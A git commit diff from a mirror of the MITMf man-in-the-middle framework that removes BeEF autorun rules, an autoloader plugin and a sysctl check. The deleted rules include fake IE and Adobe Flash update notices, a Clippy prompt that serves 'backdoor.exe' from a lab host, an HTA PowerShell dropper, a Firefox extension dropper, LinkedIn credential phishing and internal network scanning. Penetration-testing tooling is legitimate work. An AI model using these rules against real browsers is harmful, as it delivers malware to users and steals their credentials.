mirror of
https://github.com/byt3bl33d3r/MITMf.git
Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine
removed check to enable IP forwarding using sysctl
parent
77fc00539e
commit
24070afbd0
11 changed files with 4 additions and 300 deletions
|
@ -1,35 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Test return debug stuff",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "S",
|
|
||||||
"browser_version": ">= 7",
|
|
||||||
"os": "OSX",
|
|
||||||
"os_version": "<= 10.10",
|
|
||||||
"modules": [{
|
|
||||||
"name": "test_return_ascii_chars",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}, {
|
|
||||||
"name": "test_return_long_string",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
|
|
||||||
"options": {
|
|
||||||
"repeat": "10",
|
|
||||||
"repeat_string": "<<mod_input>>"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "alert_dialog",
|
|
||||||
"condition": "status=1",
|
|
||||||
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
|
|
||||||
"options":{"text":"<<mod_input>>"}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "get_page_html",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1, 2, 3],
|
|
||||||
"execution_delay": [0, 0, 0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
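--- a/config/beef_arerules/enabled/.gitignore
+++ b/config/beef_arerules/enabled/.gitignore
@@ -1,3 +0,0 @@
-*
-!.gitignore
-!README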
|
@ -1,2 +0,0 @@
|
||||||
Move here the ARE rule files that you want to load into BeEF.
|
|
||||||
Make sure they are .json files (any other file extension is ignored).
|
|
|
@ -1,20 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Firefox Extension Dropper",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "FF",
|
|
||||||
"browser_version": "ALL",
|
|
||||||
"os": "OSX",
|
|
||||||
"os_version": ">= 10.8",
|
|
||||||
"modules": [{
|
|
||||||
"name": "firefox_extension_dropper",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"extension_name": "Ummeneske",
|
|
||||||
"xpi_name": "Ummeneske",
|
|
||||||
"base_host": "http://172.16.45.1:3000"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0],
|
|
||||||
"execution_delay": [0],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,28 +0,0 @@
|
||||||
{"name": "Get Internal IP (WebRTC)",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "FF",
|
|
||||||
"browser_version": ">= 31",
|
|
||||||
"os": "Linux",
|
|
||||||
"os_version": "ALL",
|
|
||||||
"modules": [
|
|
||||||
{"name": "get_internal_ip_webrtc",
|
|
||||||
"condition": null,
|
|
||||||
"code": null,
|
|
||||||
"options": {}
|
|
||||||
},
|
|
||||||
{"name": "internal_network_fingerprinting",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
|
|
||||||
"options": {
|
|
||||||
"ipRange":"<<mod_input>>",
|
|
||||||
"ports":"80",
|
|
||||||
"threads":"5",
|
|
||||||
"wait":"2",
|
|
||||||
"timeout":"10"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
|
@ -1,31 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Ie Fake Notification + Clippy",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "== 11",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= 7",
|
|
||||||
"modules": [
|
|
||||||
{
|
|
||||||
"name": "fake_notification_ie",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
|
|
||||||
}
|
|
||||||
}
|
|
||||||
,{
|
|
||||||
"name": "clippy",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"clippydir": "http://172.16.45.1:3000/clippy/",
|
|
||||||
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
|
|
||||||
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
|
|
||||||
"respawntime":"5000",
|
|
||||||
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0,2000],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,27 +0,0 @@
|
||||||
{
|
|
||||||
"name": "HTA PowerShell",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "ALL",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= 7",
|
|
||||||
"modules": [
|
|
||||||
{
|
|
||||||
"name": "fake_notification_ie",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "hta_powershell",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"domain":"http://172.16.45.1:3000",
|
|
||||||
"ps_url":"/ps"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0,500],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,27 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Fake missing plugin + Pretty Theft LinkedIn",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": ">= 8",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": "== XP",
|
|
||||||
"modules": [{
|
|
||||||
"name": "fake_notification_c",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
|
|
||||||
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
|
|
||||||
}
|
|
||||||
}, {
|
|
||||||
"name": "pretty_theft",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"choice": "Windows",
|
|
||||||
"backing": "Grey",
|
|
||||||
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1],
|
|
||||||
"execution_delay": [0, 5000],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,35 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Test return debug stuff",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "<= 8",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= XP",
|
|
||||||
"modules": [{
|
|
||||||
"name": "test_return_ascii_chars",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}, {
|
|
||||||
"name": "test_return_long_string",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
|
|
||||||
"options": {
|
|
||||||
"repeat": "10",
|
|
||||||
"repeat_string": "<<mod_input>>"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "alert_dialog",
|
|
||||||
"condition": "status=1",
|
|
||||||
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
|
|
||||||
"options":{"text":"<<mod_input>>"}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "get_page_html",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1, 2, 3],
|
|
||||||
"execution_delay": [0, 0, 0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
|
@ -21,7 +21,6 @@ import logging
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from commands import getstatusoutput
|
|
||||||
from core.logger import logger
|
from core.logger import logger
|
||||||
from core.proxyplugins import ProxyPlugins
|
from core.proxyplugins import ProxyPlugins
|
||||||
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
|
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
|
||||||
|
@ -35,15 +34,10 @@ def shutdown(message=None):
|
||||||
sys.exit(message)
|
sys.exit(message)
|
||||||
|
|
||||||
def set_ip_forwarding(value):
|
def set_ip_forwarding(value):
|
||||||
status, result = getstatusoutput('sysctl --help')
|
log.debug("Setting ip forwarding to {}".format(value))
|
||||||
if status == 0:
|
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
||||||
log.debug("Setting ip forwarding to {} using sysctl".format(value))
|
file.write(str(value))
|
||||||
os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX
|
file.close()
|
||||||
else:
|
|
||||||
log.debug("Setting ip forwarding to {}".format(value))
|
|
||||||
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
|
||||||
file.write(str(value))
|
|
||||||
file.close()
|
|
||||||
|
|
||||||
def get_iface():
|
def get_iface():
|
||||||
iface = get_working_if()
|
iface = get_working_if()
|
||||||
|
|
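Review bot: The rewritten `set_ip_forwarding` now opens `/proc/sys/net/ipv4/ip_forward` unconditionally, so the `open()` raises an unhandled error on a host that lacks that path (the removed `sysctl` line was commented `#for OSX`) or when the process cannot write to it. Catching the error and exiting through the `shutdown()` helper that the hunk context shows just above would give a clear message instead of a traceback, e.g. `except IOError as e: shutdown("Unable to set ip forwarding: {}".format(e))`. Separately, `file.close()` inside the `with` block is redundant and `file` shadows a builtin in Python 2 (which the `commands` import suggests this file targets); `with open(...) as f: f.write(str(value))` is enough. A short docstring stating that the function needs root and a Linux procfs would document the platform restriction this change introduces.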
|
@ -1,82 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
import os
|
|
||||||
import pyinotify
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.inject import Inject
|
|
||||||
from core.beefapi import BeefAPI
|
|
||||||
|
|
||||||
class BeefAutorun(Inject, Plugin):
|
|
||||||
name = "BeEFAutoloader"
|
|
||||||
optname = "beefauto"
|
|
||||||
desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
|
|
||||||
version = "0.4"
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.ip_address = options.ip
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
|
|
||||||
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
from core.utils import shutdown
|
|
||||||
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
|
|
||||||
if not beef.login(beefconfig['user'], beefconfig['pass']):
|
|
||||||
shutdown("[BeEFAutorun] Error logging in to BeEF!")
|
|
||||||
|
|
||||||
self.tree_info.append('Starting RuleWatcher')
|
|
||||||
RuleWatcher(beef, self.log).start()
|
|
||||||
|
|
||||||
def options(self, options):
|
|
||||||
pass
|
|
||||||
|
|
||||||
class RuleWatcher(pyinotify.ProcessEvent):
|
|
||||||
|
|
||||||
def __init__(self, beef, logger):
|
|
||||||
pyinotify.ProcessEvent.__init__(self)
|
|
||||||
self.beef = beef
|
|
||||||
self.log = logger
|
|
||||||
|
|
||||||
def process_IN_MODIFY(self, event):
|
|
||||||
self.log.debug('Detected ARE rule change!')
|
|
||||||
for rule in self.beef.are_rules.list():
|
|
||||||
self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
|
|
||||||
rule.delete()
|
|
||||||
|
|
||||||
if event.src_path.endswith('.json'):
|
|
||||||
self.log.debug('Detected ARE rule modification/addition!')
|
|
||||||
for rule in os.listdir('./config/beef_arerules/enabled'):
|
|
||||||
if rule.endswith('.json'):
|
|
||||||
rule_path = './config/beef_arerules/enabled/' + rule
|
|
||||||
self.log.debug('Adding rule {}'.format(rule_path))
|
|
||||||
self.beef.are_rules.add(rule_path)
|
|
||||||
|
|
||||||
def start(self):
|
|
||||||
wm = pyinotify.WatchManager()
|
|
||||||
wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
|
|
||||||
notifier = pyinotify.Notifier(wm, self)
|
|
||||||
|
|
||||||
t = threading.Thread(name='RuleWatcher', target=notifier.loop)
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|